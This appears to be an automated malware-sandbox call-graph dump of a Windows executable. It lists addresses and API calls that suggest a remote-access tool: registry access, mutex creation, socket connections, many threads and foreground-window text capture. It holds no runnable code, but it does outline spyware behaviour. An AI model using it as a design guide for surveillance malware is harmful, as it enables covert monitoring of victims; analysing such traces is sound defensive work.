401e65 22 API calls 47598->47601 47600 43455e new 22 API calls 47599->47600 47602 40f161 47600->47602 47603 40f19d 47601->47603 47604 401e65 22 API calls 47602->47604 47606 40f207 47603->47606 47607 40f1a9 47603->47607 47605 40f173 47604->47605 47608 40f17a CreateThread 47605->47608 47609 401e65 22 API calls 47606->47609 47610 401e65 22 API calls 47607->47610 47608->47598 49089 41a045 103 API calls 2 library calls 47608->49089 47611 40f210 47609->47611 47612 40f1b9 47610->47612 47614 40f255 47611->47614 47615 40f21c 47611->47615 47613 401e65 22 API calls 47612->47613 47617 40f1ce 47613->47617 48111 41b69e 47614->48111 47616 401e65 22 API calls 47615->47616 47619 40f225 47616->47619 48313 40da23 31 API calls 47617->48313 47625 401e65 22 API calls 47619->47625 47621 401f13 28 API calls 47623 40f269 47621->47623 47624 401f09 11 API calls 47623->47624 47627 40f272 47624->47627 47628 40f23a 47625->47628 47626 40f1e1 47629 401f13 28 API calls 47626->47629 47630 40f27b SetProcessDEPPolicy 47627->47630 47631 40f27e CreateThread 47627->47631 47638 43bb2c _strftime 40 API calls 47628->47638 47632 40f1ed 47629->47632 47630->47631 47633 40f293 CreateThread 47631->47633 47634 40f29f 47631->47634 49058 40f7e2 47631->49058 47635 401f09 11 API calls 47632->47635 47633->47634 49085 412132 138 API calls 47633->49085 47636 40f2b4 47634->47636 47637 40f2a8 CreateThread 47634->47637 47639 40f1f6 CreateThread 47635->47639 47641 40f307 47636->47641 47643 402093 28 API calls 47636->47643 47637->47636 49087 412716 38 API calls ___scrt_get_show_window_mode 47637->49087 47640 40f247 47638->47640 47639->47606 49088 401be9 50 API calls _strftime 47639->49088 48314 40c19d 7 API calls 47640->48314 48123 41353a RegOpenKeyExA 47641->48123 47644 40f2d7 47643->47644 48315 4052fd 28 API calls 47644->48315 47650 40f328 47652 41bcef 28 API calls 47650->47652 47654 40f338 47652->47654 48316 413656 31 API calls 47654->48316 47658 40f34e 47659 401f09 11 API calls 47658->47659 47662 40f359 47659->47662 47660 40f381 DeleteFileW 47661 40f388 47660->47661 47660->47662 47661->47467 47662->47467 47662->47660 47663 40f36f Sleep 47662->47663 47663->47662 47664->47334 47665->47341 47666->47351 47667->47352 47668->47354 47669->47357 47670->47361 47672 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47671->47672 47684 43a4ba 47672->47684 47675 438fc4 47675->47363 47677 438fcc 47678 438fd7 47677->47678 47698 43a4f6 DeleteCriticalSection 47677->47698 47678->47363 47726 44fbe8 47680->47726 47683 438fda 8 API calls 3 library calls 47683->47368 47686 43a4c3 47684->47686 47687 43a4ec 47686->47687 47688 438fc0 47686->47688 47699 438eff 47686->47699 47704 43a4f6 DeleteCriticalSection 47687->47704 47688->47675 47690 43a46c 47688->47690 47719 438e14 47690->47719 47692 43a481 47692->47677 47693 43a476 47693->47692 47724 438ec2 6 API calls try_get_function 47693->47724 47695 43a48f 47696 43a49c 47695->47696 47725 43a49f 6 API calls ___vcrt_FlsFree 47695->47725 47696->47677 47698->47675 47705 438cf3 47699->47705 47702 438f22 47702->47686 47703 438f36 InitializeCriticalSectionAndSpinCount 47703->47702 47704->47688 47709 438d27 47705->47709 47710 438d23 47705->47710 47706 438d47 47708 438d53 GetProcAddress 47706->47708 47706->47709 47711 438d63 __crt_fast_encode_pointer 47708->47711 47709->47702 47709->47703 47710->47706 47710->47709 47712 438d93 47710->47712 47711->47709 47713 438dbb LoadLibraryExW 47712->47713 47714 438db0 47712->47714 47715 438dd7 GetLastError 47713->47715 47716 438def 47713->47716 47714->47710 47715->47716 47717 438de2 LoadLibraryExW 47715->47717 47716->47714 47718 438e06 FreeLibrary 47716->47718 47717->47716 47718->47714 47720 438cf3 try_get_function 5 API calls 47719->47720 47721 438e2e 47720->47721 47722 438e46 TlsAlloc 47721->47722 47723 438e37 47721->47723 47723->47693 47724->47695 47725->47692 47729 44fc01 47726->47729 47727 43502b ___crtLCMapStringA 5 API calls 47728 43464e 47727->47728 47728->47366 47728->47683 47729->47727 47731 434bb8 GetStartupInfoW 47730->47731 47731->47380 47733 44f0eb 47732->47733 47734 44f0e2 47732->47734 47733->47383 47737 44efd8 47734->47737 47736->47383 47757 448295 GetLastError 47737->47757 47739 44efe5 47778 44f0f7 47739->47778 47741 44efed 47787 44ed6c 47741->47787 47744 44f004 47744->47733 47747 44f047 47812 446802 20 API calls _free 47747->47812 47751 44f042 47811 44062d 20 API calls _abort 47751->47811 47753 44f08b 47753->47747 47814 44ec42 20 API calls 47753->47814 47754 44f05f 47754->47753 47813 446802 20 API calls _free 47754->47813 47758 4482b7 47757->47758 47759 4482ab 47757->47759 47816 445b74 20 API calls 3 library calls 47758->47816 47815 44883c 11 API calls 2 library calls 47759->47815 47762 4482b1 47762->47758 47764 448300 SetLastError 47762->47764 47763 4482c3 47765 4482cb 47763->47765 47818 448892 11 API calls 2 library calls 47763->47818 47764->47739 47817 446802 20 API calls _free 47765->47817 47768 4482e0 47768->47765 47770 4482e7 47768->47770 47769 4482d1 47771 44830c SetLastError 47769->47771 47819 448107 20 API calls _abort 47770->47819 47821 446175 36 API calls 4 library calls 47771->47821 47774 4482f2 47820 446802 20 API calls _free 47774->47820 47776 448318 47777 4482f9 47777->47764 47777->47771 47779 44f103 ___FrameUnwindToState 47778->47779 47780 448295 pre_c_initialization 36 API calls 47779->47780 47781 44f10d 47780->47781 47784 44f191 ___FrameUnwindToState 47781->47784 47822 446175 36 API calls 4 library calls 47781->47822 47823 445909 EnterCriticalSection 47781->47823 47824 446802 20 API calls _free 47781->47824 47825 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 47781->47825 47784->47741 47826 43a837 47787->47826 47790 44ed8d GetOEMCP 47793 44edb6 47790->47793 47791 44ed9f 47792 44eda4 GetACP 47791->47792 47791->47793 47792->47793 47793->47744 47794 4461b8 47793->47794 47795 4461f6 47794->47795 47799 4461c6 ___crtLCMapStringA 47794->47799 47837 44062d 20 API calls _abort 47795->47837 47797 4461e1 RtlAllocateHeap 47798 4461f4 47797->47798 47797->47799 47798->47747 47801 44f199 47798->47801 47799->47795 47799->47797 47836 443001 7 API calls 2 library calls 47799->47836 47802 44ed6c 38 API calls 47801->47802 47803 44f1b8 47802->47803 47806 44f209 IsValidCodePage 47803->47806 47808 44f1bf 47803->47808 47810 44f22e ___scrt_get_show_window_mode 47803->47810 47804 43502b ___crtLCMapStringA 5 API calls 47805 44f03a 47804->47805 47805->47751 47805->47754 47807 44f21b GetCPInfo 47806->47807 47806->47808 47807->47808 47807->47810 47808->47804 47838 44ee44 GetCPInfo 47810->47838 47811->47747 47812->47744 47813->47753 47814->47747 47815->47762 47816->47763 47817->47769 47818->47768 47819->47774 47820->47777 47821->47776 47822->47781 47823->47781 47824->47781 47825->47781 47827 43a854 47826->47827 47828 43a84a 47826->47828 47827->47828 47829 448295 pre_c_initialization 36 API calls 47827->47829 47828->47790 47828->47791 47830 43a875 47829->47830 47834 4483e4 36 API calls __Toupper 47830->47834 47832 43a88e 47835 448411 36 API calls __cftof 47832->47835 47834->47832 47835->47828 47836->47799 47837->47798 47839 44ef28 47838->47839 47845 44ee7e 47838->47845 47842 43502b ___crtLCMapStringA 5 API calls 47839->47842 47844 44efd4 47842->47844 47844->47808 47848 4511ac 47845->47848 47847 44aee6 _swprintf 41 API calls 47847->47839 47849 43a837 __cftof 36 API calls 47848->47849 47850 4511cc MultiByteToWideChar 47849->47850 47852 45120a 47850->47852 47859 4512a2 47850->47859 47854 4461b8 ___crtLCMapStringA 21 API calls 47852->47854 47858 45122b __alloca_probe_16 ___scrt_get_show_window_mode 47852->47858 47853 43502b ___crtLCMapStringA 5 API calls 47855 44eedf 47853->47855 47854->47858 47862 44aee6 47855->47862 47856 45129c 47867 435ecd 20 API calls _free 47856->47867 47858->47856 47860 451270 MultiByteToWideChar 47858->47860 47859->47853 47860->47856 47861 45128c GetStringTypeW 47860->47861 47861->47856 47863 43a837 __cftof 36 API calls 47862->47863 47864 44aef9 47863->47864 47868 44acc9 47864->47868 47867->47859 47869 44ace4 ___crtLCMapStringA 47868->47869 47870 44ad0a MultiByteToWideChar 47869->47870 47871 44ad34 47870->47871 47882 44aebe 47870->47882 47874 4461b8 ___crtLCMapStringA 21 API calls 47871->47874 47880 44ad55 __alloca_probe_16 47871->47880 47872 43502b ___crtLCMapStringA 5 API calls 47873 44aed1 47872->47873 47873->47847 47874->47880 47875 44ae0a 47904 435ecd 20 API calls _free 47875->47904 47876 44ad9e MultiByteToWideChar 47876->47875 47877 44adb7 47876->47877 47895 448c33 47877->47895 47880->47875 47880->47876 47882->47872 47883 44ade1 47883->47875 47886 448c33 _strftime 11 API calls 47883->47886 47884 44ae19 47885 4461b8 ___crtLCMapStringA 21 API calls 47884->47885 47888 44ae3a __alloca_probe_16 47884->47888 47885->47888 47886->47875 47887 44aeaf 47903 435ecd 20 API calls _free 47887->47903 47888->47887 47889 448c33 _strftime 11 API calls 47888->47889 47891 44ae8e 47889->47891 47891->47887 47892 44ae9d WideCharToMultiByte 47891->47892 47892->47887 47893 44aedd 47892->47893 47905 435ecd 20 API calls _free 47893->47905 47896 44854a _abort 5 API calls 47895->47896 47897 448c5a 47896->47897 47900 448c63 47897->47900 47906 448cbb 10 API calls 3 library calls 47897->47906 47899 448ca3 LCMapStringW 47899->47900 47901 43502b ___crtLCMapStringA 5 API calls 47900->47901 47902 448cb5 47901->47902 47902->47875 47902->47883 47902->47884 47903->47875 47904->47882 47905->47875 47906->47899 47908 41cc20 LoadLibraryA GetProcAddress 47907->47908 47909 41cc10 GetModuleHandleA GetProcAddress 47907->47909 47910 41cc49 44 API calls 47908->47910 47911 41cc39 LoadLibraryA GetProcAddress 47908->47911 47909->47908 47910->47388 47911->47910 48319 41b539 FindResourceA 47912->48319 47916 40f428 _Yarn 48329 4020b7 47916->48329 47919 401fe2 28 API calls 47920 40f44e 47919->47920 47921 401fd8 11 API calls 47920->47921 47922 40f457 47921->47922 47923 43bda0 _Yarn 21 API calls 47922->47923 47924 40f468 _Yarn 47923->47924 48335 406e13 47924->48335 47926 40f49b 47926->47390 47928 40210c 47927->47928 47929 4023ce 11 API calls 47928->47929 47930 402126 47929->47930 47931 402569 28 API calls 47930->47931 47932 402134 47931->47932 47932->47393 48389 4020df 47933->48389 47935 41bf2f 47936 401fd8 11 API calls 47935->47936 47937 41bf61 47936->47937 47939 401fd8 11 API calls 47937->47939 47938 41bf31 48395 4041a2 28 API calls 47938->48395 47942 41bf69 47939->47942 47944 401fd8 11 API calls 47942->47944 47943 41bf3d 47945 401fe2 28 API calls 47943->47945 47947 40ea5f 47944->47947 47948 41bf46 47945->47948 47946 401fe2 28 API calls 47954 41bebf 47946->47954 47955 40fb52 47947->47955 47949 401fd8 11 API calls 47948->47949 47951 41bf4e 47949->47951 47950 401fd8 11 API calls 47950->47954 48396 41cec5 28 API calls 47951->48396 47954->47935 47954->47938 47954->47946 47954->47950 48393 4041a2 28 API calls 47954->48393 48394 41cec5 28 API calls 47954->48394 47956 40fb5e 47955->47956 47958 40fb65 47955->47958 48397 402163 11 API calls 47956->48397 47958->47398 47960 402163 47959->47960 47964 40219f 47960->47964 48398 402730 11 API calls 47960->48398 47962 402184 48399 402712 11 API calls std::_Deallocate 47962->48399 47964->47400 47966 401e6d 47965->47966 47969 401e75 47966->47969 48400 402158 22 API calls 47966->48400 47969->47405 47971 4020df 11 API calls 47970->47971 47972 40532a 47971->47972 48401 4032a0 47972->48401 47974 405346 47974->47413 48405 4051ef 47975->48405 47977 406391 48409 402055 47977->48409 47980 401fe2 47981 401ff1 47980->47981 47988 402039 47980->47988 47982 4023ce 11 API calls 47981->47982 47983 401ffa 47982->47983 47984 40203c 47983->47984 47986 402015 47983->47986 47985 40267a 11 API calls 47984->47985 47985->47988 48441 403098 28 API calls 47986->48441 47989 401fd8 47988->47989 47990 4023ce 11 API calls 47989->47990 47991 401fe1 47990->47991 47991->47426 47993 401fd2 47992->47993 47994 401fc9 47992->47994 47993->47431 48442 4025e0 28 API calls 47994->48442 48443 401fab 47996->48443 47998 40d0ae CreateMutexA GetLastError 47998->47447 48444 41c048 47999->48444 48004 401fe2 28 API calls 48005 41b390 48004->48005 48006 401fd8 11 API calls 48005->48006 48007 41b398 48006->48007 48008 4135e1 31 API calls 48007->48008 48010 41b3ee 48007->48010 48009 41b3c1 48008->48009 48011 41b3cc StrToIntA 48009->48011 48010->47453 48012 41b3e3 48011->48012 48013 41b3da 48011->48013 48014 401fd8 11 API calls 48012->48014 48452 41cffa 22 API calls 48013->48452 48014->48010 48017 407765 48016->48017 48018 413584 3 API calls 48017->48018 48019 40776c 48018->48019 48019->47464 48019->47465 48021 41bd03 48020->48021 48453 40b93f 48021->48453 48023 41bd0b 48023->47481 48025 401f22 48024->48025 48026 401f6a 48024->48026 48027 402252 11 API calls 48025->48027 48033 401f09 48026->48033 48028 401f2b 48027->48028 48029 401f6d 48028->48029 48031 401f46 48028->48031 48486 402336 48029->48486 48485 40305c 28 API calls 48031->48485 48034 402252 11 API calls 48033->48034 48035 401f12 48034->48035 48035->47493 48037 4139a0 48036->48037 48038 406e13 28 API calls 48037->48038 48039 4139b5 48038->48039 48040 4020f6 28 API calls 48039->48040 48041 4139c5 48040->48041 48042 4137aa 14 API calls 48041->48042 48043 4139cf 48042->48043 48044 401fd8 11 API calls 48043->48044 48045 4139dc 48044->48045 48045->47543 48047 40209b 48046->48047 48048 4023ce 11 API calls 48047->48048 48049 4020a6 48048->48049 48490 4024ed 48049->48490 48053 4137fa 48052->48053 48055 4137c3 48052->48055 48054 401fd8 11 API calls 48053->48054 48056 40efd9 48054->48056 48057 4137d5 RegSetValueExA RegCloseKey 48055->48057 48056->47544 48057->48053 48059 43bb45 _strftime 48058->48059 48494 43ae83 48059->48494 48061 40eff2 48061->47550 48061->47552 48063 41b631 48062->48063 48064 41b596 GetLocalTime 48062->48064 48065 401fd8 11 API calls 48063->48065 48066 40531e 28 API calls 48064->48066 48067 41b639 48065->48067 48068 41b5d8 48066->48068 48069 401fd8 11 API calls 48067->48069 48070 406383 28 API calls 48068->48070 48071 40f048 48069->48071 48072 41b5e4 48070->48072 48071->47568 48521 402f10 48072->48521 48075 406383 28 API calls 48076 41b5fc 48075->48076 48526 40723b 77 API calls 48076->48526 48078 41b60a 48079 401fd8 11 API calls 48078->48079 48080 41b616 48079->48080 48081 401fd8 11 API calls 48080->48081 48082 41b61f 48081->48082 48083 401fd8 11 API calls 48082->48083 48084 41b628 48083->48084 48085 401fd8 11 API calls 48084->48085 48085->48063 48087 409e3d _wcslen 48086->48087 48088 409e48 48087->48088 48089 409e5f 48087->48089 48091 40da6f 31 API calls 48088->48091 48090 40da6f 31 API calls 48089->48090 48092 409e67 48090->48092 48093 409e50 48091->48093 48094 401f13 28 API calls 48092->48094 48095 401f13 28 API calls 48093->48095 48096 409e75 48094->48096 48097 409e5a 48095->48097 48098 401f09 11 API calls 48096->48098 48100 401f09 11 API calls 48097->48100 48099 409e7d 48098->48099 48545 409196 28 API calls 48099->48545 48101 409eb4 48100->48101 48530 40a144 48101->48530 48104 409e8f 48546 403014 48104->48546 48108 401f13 28 API calls 48109 409ea4 48108->48109 48110 401f09 11 API calls 48109->48110 48110->48097 48112 41b6c1 GetUserNameW 48111->48112 48738 40417e 48112->48738 48117 403014 28 API calls 48118 41b703 48117->48118 48119 401f09 11 API calls 48118->48119 48120 41b70c 48119->48120 48121 401f09 11 API calls 48120->48121 48122 40f25e 48121->48122 48122->47621 48124 41355b RegQueryValueExA RegCloseKey 48123->48124 48125 40f31f 48123->48125 48124->48125 48125->47494 48125->47650 48127 413a7a RegDeleteValueW 48126->48127 48128 40f3cd 48126->48128 48127->48128 48128->47488 48130 40dd96 48129->48130 48131 41353a 3 API calls 48130->48131 48132 40dd9d 48131->48132 48133 40ddbc 48132->48133 48832 401707 48132->48832 48137 414f65 48133->48137 48135 40ddaa 48835 4138b2 RegCreateKeyA 48135->48835 48138 4020df 11 API calls 48137->48138 48139 414f79 48138->48139 48855 41b944 48139->48855 48142 4020df 11 API calls 48143 414f8f 48142->48143 48144 401e65 22 API calls 48143->48144 48145 414f9d 48144->48145 48146 43bb2c _strftime 40 API calls 48145->48146 48147 414faa 48146->48147 48148 414fbc 48147->48148 48149 414faf Sleep 48147->48149 48150 402093 28 API calls 48148->48150 48149->48148 48151 414fcb 48150->48151 48152 401e65 22 API calls 48151->48152 48153 414fd4 48152->48153 48154 4020f6 28 API calls 48153->48154 48155 414fdf 48154->48155 48156 41beac 28 API calls 48155->48156 48157 414fe7 48156->48157 48859 40489e WSAStartup 48157->48859 48159 414ff1 48160 401e65 22 API calls 48159->48160 48161 414ffa 48160->48161 48162 401e65 22 API calls 48161->48162 48188 415079 48161->48188 48163 415013 48162->48163 48165 401e65 22 API calls 48163->48165 48164 4020f6 28 API calls 48164->48188 48166 415024 48165->48166 48169 401e65 22 API calls 48166->48169 48167 41beac 28 API calls 48167->48188 48168 401e65 22 API calls 48168->48188 48170 415035 48169->48170 48171 401e65 22 API calls 48170->48171 48173 415046 48171->48173 48172 406c59 28 API calls 48172->48188 48175 401e65 22 API calls 48173->48175 48174 401fe2 28 API calls 48174->48188 48176 415057 48175->48176 48177 401e65 22 API calls 48176->48177 48178 415069 48177->48178 48972 40473d 89 API calls 48178->48972 48180 41b580 80 API calls 48180->48188 48182 4151c7 WSAGetLastError 48865 41cb72 48182->48865 48187 402093 28 API calls 48187->48188 48188->48164 48188->48167 48188->48168 48188->48172 48188->48174 48188->48180 48188->48182 48188->48187 48191 40531e 28 API calls 48188->48191 48192 401e8d 11 API calls 48188->48192 48193 402f10 28 API calls 48188->48193 48194 43bb2c _strftime 40 API calls 48188->48194 48196 406383 28 API calls 48188->48196 48197 401fd8 11 API calls 48188->48197 48199 409097 28 API calls 48188->48199 48202 4135e1 31 API calls 48188->48202 48206 4153f6 48188->48206 48860 414f24 48188->48860 48876 40482d 48188->48876 48883 404f51 48188->48883 48898 4048c8 connect 48188->48898 48958 404e26 WaitForSingleObject 48188->48958 48973 4052fd 28 API calls 48188->48973 48974 4145f8 51 API calls 48188->48974 48975 441ed1 20 API calls 48188->48975 48976 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 48188->48976 48191->48188 48192->48188 48193->48188 48195 415b0a Sleep 48194->48195 48195->48188 48196->48188 48197->48188 48199->48188 48202->48188 48203 40417e 28 API calls 48203->48206 48206->48188 48206->48203 48207 401e65 22 API calls 48206->48207 48211 41bc1f 28 API calls 48206->48211 48213 41bdaf 28 API calls 48206->48213 48216 406383 28 API calls 48206->48216 48217 402ea1 28 API calls 48206->48217 48218 402f10 28 API calls 48206->48218 48220 401fd8 11 API calls 48206->48220 48221 401f09 11 API calls 48206->48221 48224 402093 28 API calls 48206->48224 48225 41b580 80 API calls 48206->48225 48226 415aac CreateThread 48206->48226 48977 40ddc4 6 API calls 48206->48977 48978 41bcd3 28 API calls 48206->48978 48980 41bb77 GetTickCount 48206->48980 48981 41bb27 30 API calls ___scrt_get_show_window_mode 48206->48981 48982 40f90c 29 API calls 48206->48982 48983 402f31 28 API calls 48206->48983 48984 404aa1 61 API calls _Yarn 48206->48984 48985 404c10 113 API calls _Yarn 48206->48985 48986 40b08c 85 API calls 48206->48986 48208 415474 GetTickCount 48207->48208 48979 41bc1f 28 API calls 48208->48979 48211->48206 48213->48206 48216->48206 48217->48206 48218->48206 48220->48206 48221->48206 48224->48206 48225->48206 48226->48206 49048 41ada8 105 API calls 48226->49048 48227->47406 48228->47414 48229->47418 48232 4020df 11 API calls 48231->48232 48233 406c65 48232->48233 48234 4032a0 28 API calls 48233->48234 48235 406c82 48234->48235 48235->47439 48237 40ebdf 48236->48237 48238 4135ae RegQueryValueExA RegCloseKey 48236->48238 48237->47436 48237->47454 48238->48237 48239->47444 48240->47473 48241->47464 48242->47456 48243->47472 48245 401f86 11 API calls 48244->48245 48246 40da8b 48245->48246 48247 40dae0 48246->48247 48248 40daab 48246->48248 48250 40daa1 48246->48250 48249 41c048 GetCurrentProcess 48247->48249 49049 41b645 29 API calls 48248->49049 48253 40dae5 48249->48253 48252 40dbd4 GetLongPathNameW 48250->48252 48255 40417e 28 API calls 48252->48255 48256 40dae9 48253->48256 48257 40db3b 48253->48257 48254 40dab4 48258 401f13 28 API calls 48254->48258 48259 40dbe9 48255->48259 48262 40417e 28 API calls 48256->48262 48261 40417e 28 API calls 48257->48261 48263 40dabe 48258->48263 48260 40417e 28 API calls 48259->48260 48264 40dbf8 48260->48264 48265 40db49 48261->48265 48266 40daf7 48262->48266 48268 401f09 11 API calls 48263->48268 49052 40de0c 28 API calls 48264->49052 48271 40417e 28 API calls 48265->48271 48272 40417e 28 API calls 48266->48272 48268->48250 48269 40dc0b 49053 402fa5 28 API calls 48269->49053 48274 40db5f 48271->48274 48275 40db0d 48272->48275 48273 40dc16 49054 402fa5 28 API calls 48273->49054 49051 402fa5 28 API calls 48274->49051 49050 402fa5 28 API calls 48275->49050 48279 40dc20 48282 401f09 11 API calls 48279->48282 48280 40db6a 48283 401f13 28 API calls 48280->48283 48281 40db18 48284 401f13 28 API calls 48281->48284 48285 40dc2a 48282->48285 48286 40db75 48283->48286 48287 40db23 48284->48287 48288 401f09 11 API calls 48285->48288 48289 401f09 11 API calls 48286->48289 48290 401f09 11 API calls 48287->48290 48291 40dc33 48288->48291 48292 40db7e 48289->48292 48293 40db2c 48290->48293 48294 401f09 11 API calls 48291->48294 48295 401f09 11 API calls 48292->48295 48296 401f09 11 API calls 48293->48296 48297 40dc3c 48294->48297 48295->48263 48296->48263 48298 401f09 11 API calls 48297->48298 48299 40dc45 48298->48299 48300 401f09 11 API calls 48299->48300 48301 40dc4e 48300->48301 48301->47530 48302->47541 48303->47564 48304->47523 48305->47556 48308 434563 48306->48308 48307 43bda0 _Yarn 21 API calls 48307->48308 48308->48307 48309 40f10c 48308->48309 49055 443001 7 API calls 2 library calls 48308->49055 49056 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48308->49056 49057 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48308->49057 48309->47594 48313->47626 48314->47614 48316->47658 48317->47463 48320 41b556 LoadResource LockResource SizeofResource 48319->48320 48321 40f419 48319->48321 48320->48321 48322 43bda0 48321->48322 48327 4461b8 ___crtLCMapStringA 48322->48327 48323 4461f6 48339 44062d 20 API calls _abort 48323->48339 48325 4461e1 RtlAllocateHeap 48326 4461f4 48325->48326 48325->48327 48326->47916 48327->48323 48327->48325 48338 443001 7 API calls 2 library calls 48327->48338 48330 4020bf 48329->48330 48340 4023ce 48330->48340 48332 4020ca 48344 40250a 48332->48344 48334 4020d9 48334->47919 48336 4020b7 28 API calls 48335->48336 48337 406e27 48336->48337 48337->47926 48338->48327 48339->48326 48341 402428 48340->48341 48342 4023d8 48340->48342 48341->48332 48342->48341 48351 4027a7 11 API calls std::_Deallocate 48342->48351 48345 40251a 48344->48345 48346 402520 48345->48346 48347 402535 48345->48347 48352 402569 48346->48352 48362 4028e8 48347->48362 48350 402533 48350->48334 48351->48341 48373 402888 48352->48373 48354 40257d 48355 402592 48354->48355 48356 4025a7 48354->48356 48378 402a34 22 API calls 48355->48378 48358 4028e8 28 API calls 48356->48358 48361 4025a5 48358->48361 48359 40259b 48379 4029da 22 API calls 48359->48379 48361->48350 48363 4028f1 48362->48363 48364 402953 48363->48364 48365 4028fb 48363->48365 48387 4028a4 22 API calls 48364->48387 48368 402917 48365->48368 48369 402904 48365->48369 48371 402915 48368->48371 48372 4023ce 11 API calls 48368->48372 48381 402cae 48369->48381 48371->48350 48372->48371 48374 402890 48373->48374 48375 402898 48374->48375 48380 402ca3 22 API calls 48374->48380 48375->48354 48378->48359 48379->48361 48382 402cb8 __EH_prolog 48381->48382 48388 402e54 22 API calls 48382->48388 48384 4023ce 11 API calls 48386 402d92 48384->48386 48385 402d24 48385->48384 48386->48371 48388->48385 48390 4020e7 48389->48390 48391 4023ce 11 API calls 48390->48391 48392 4020f2 48391->48392 48392->47954 48393->47954 48394->47954 48395->47943 48396->47935 48397->47958 48398->47962 48399->47964 48403 4032aa 48401->48403 48402 4032c9 48402->47974 48403->48402 48404 4028e8 28 API calls 48403->48404 48404->48402 48406 4051fb 48405->48406 48415 405274 48406->48415 48408 405208 48408->47977 48410 402061 48409->48410 48411 4023ce 11 API calls 48410->48411 48412 40207b 48411->48412 48437 40267a 48412->48437 48416 405282 48415->48416 48417 405288 48416->48417 48418 40529e 48416->48418 48426 4025f0 48417->48426 48420 4052f5 48418->48420 48421 4052b6 48418->48421 48435 4028a4 22 API calls 48420->48435 48424 4028e8 28 API calls 48421->48424 48425 40529c 48421->48425 48424->48425 48425->48408 48427 402888 22 API calls 48426->48427 48428 402602 48427->48428 48429 402672 48428->48429 48430 402629 48428->48430 48436 4028a4 22 API calls 48429->48436 48433 4028e8 28 API calls 48430->48433 48434 40263b 48430->48434 48433->48434 48434->48425 48438 40268b 48437->48438 48439 4023ce 11 API calls 48438->48439 48440 40208d 48439->48440 48440->47980 48441->47988 48442->47993 48445 41b362 48444->48445 48446 41c055 GetCurrentProcess 48444->48446 48447 4135e1 RegOpenKeyExA 48445->48447 48446->48445 48448 41360f RegQueryValueExA RegCloseKey 48447->48448 48449 413639 48447->48449 48448->48449 48450 402093 28 API calls 48449->48450 48451 41364e 48450->48451 48451->48004 48452->48012 48454 40b947 48453->48454 48459 402252 48454->48459 48456 40b952 48463 40b967 48456->48463 48458 40b961 48458->48023 48460 4022ac 48459->48460 48461 40225c 48459->48461 48460->48456 48461->48460 48470 402779 11 API calls std::_Deallocate 48461->48470 48464 40b9a1 48463->48464 48465 40b973 48463->48465 48482 4028a4 22 API calls 48464->48482 48471 4027e6 48465->48471 48469 40b97d 48469->48458 48470->48460 48472 4027ef 48471->48472 48473 402851 48472->48473 48474 4027f9 48472->48474 48484 4028a4 22 API calls 48473->48484 48477 402802 48474->48477 48478 402815 48474->48478 48483 402aea 28 API calls __EH_prolog 48477->48483 48480 402813 48478->48480 48481 402252 11 API calls 48478->48481 48480->48469 48481->48480 48483->48480 48485->48026 48487 402347 48486->48487 48488 402252 11 API calls 48487->48488 48489 4023c7 48488->48489 48489->48026 48491 4024f9 48490->48491 48492 40250a 28 API calls 48491->48492 48493 4020b1 48492->48493 48493->47535 48510 43ba8a 48494->48510 48496 43aed0 48497 43a837 __cftof 36 API calls 48496->48497 48502 43aedc 48497->48502 48498 43ae95 48498->48496 48499 43aeaa 48498->48499 48509 43aeaf pre_c_initialization 48498->48509 48515 44062d 20 API calls _abort 48499->48515 48503 43af0b 48502->48503 48516 43bacf 40 API calls __Tolower 48502->48516 48505 43af77 48503->48505 48517 43ba36 20 API calls 2 library calls 48503->48517 48518 43ba36 20 API calls 2 library calls 48505->48518 48507 43b03e _strftime 48507->48509 48519 44062d 20 API calls _abort 48507->48519 48509->48061 48511 43baa2 48510->48511 48512 43ba8f 48510->48512 48511->48498 48520 44062d 20 API calls _abort 48512->48520 48514 43ba94 pre_c_initialization 48514->48498 48515->48509 48516->48502 48517->48505 48518->48507 48519->48509 48520->48514 48527 401fb0 48521->48527 48523 402f1e 48524 402055 11 API calls 48523->48524 48525 402f2d 48524->48525 48525->48075 48526->48078 48528 4025f0 28 API calls 48527->48528 48529 401fbd 48528->48529 48529->48523 48531 40a162 48530->48531 48532 413584 3 API calls 48531->48532 48533 40a169 48532->48533 48534 40a197 48533->48534 48535 40a17d 48533->48535 48551 409097 48534->48551 48537 40a182 48535->48537 48538 409ed6 48535->48538 48540 409097 28 API calls 48537->48540 48538->47587 48542 40a190 48540->48542 48579 40a268 29 API calls 48542->48579 48544 40a195 48544->48538 48545->48104 48715 403222 48546->48715 48548 403022 48719 403262 48548->48719 48552 4090ad 48551->48552 48553 402252 11 API calls 48552->48553 48554 4090c7 48553->48554 48580 404267 48554->48580 48556 4090d5 48557 40a1b4 48556->48557 48592 40b927 48557->48592 48560 40a205 48562 402093 28 API calls 48560->48562 48561 40a1dd 48563 402093 28 API calls 48561->48563 48564 40a210 48562->48564 48565 40a1e7 48563->48565 48566 402093 28 API calls 48564->48566 48567 41bcef 28 API calls 48565->48567 48568 40a21f 48566->48568 48569 40a1f5 48567->48569 48570 41b580 80 API calls 48568->48570 48596 40b19f 31 API calls _Yarn 48569->48596 48573 40a224 CreateThread 48570->48573 48572 40a1fc 48574 401fd8 11 API calls 48572->48574 48575 40a24b CreateThread 48573->48575 48576 40a23f CreateThread 48573->48576 48601 40a2b8 48573->48601 48574->48560 48577 401f09 11 API calls 48575->48577 48598 40a2c4 48575->48598 48576->48575 48604 40a2a2 48576->48604 48578 40a25f 48577->48578 48578->48538 48579->48544 48714 40a2ae 163 API calls 48579->48714 48581 402888 22 API calls 48580->48581 48582 40427b 48581->48582 48583 404290 48582->48583 48584 4042a5 48582->48584 48590 4042df 22 API calls 48583->48590 48585 4027e6 28 API calls 48584->48585 48589 4042a3 48585->48589 48587 404299 48591 402c48 22 API calls 48587->48591 48589->48556 48590->48587 48591->48589 48593 40b930 48592->48593 48594 40a1d2 48592->48594 48597 40b9a7 28 API calls 48593->48597 48594->48560 48594->48561 48596->48572 48597->48594 48607 40ad11 48598->48607 48650 40a761 48601->48650 48697 40a2f3 48604->48697 48614 40ad1f 48607->48614 48608 40a2cd 48609 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48610 40b93f 28 API calls 48609->48610 48610->48614 48614->48608 48614->48609 48617 40adbf GetWindowTextW 48614->48617 48635 40add9 48614->48635 48637 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48614->48637 48638 401f86 48614->48638 48642 434801 23 API calls __onexit 48614->48642 48643 43441b 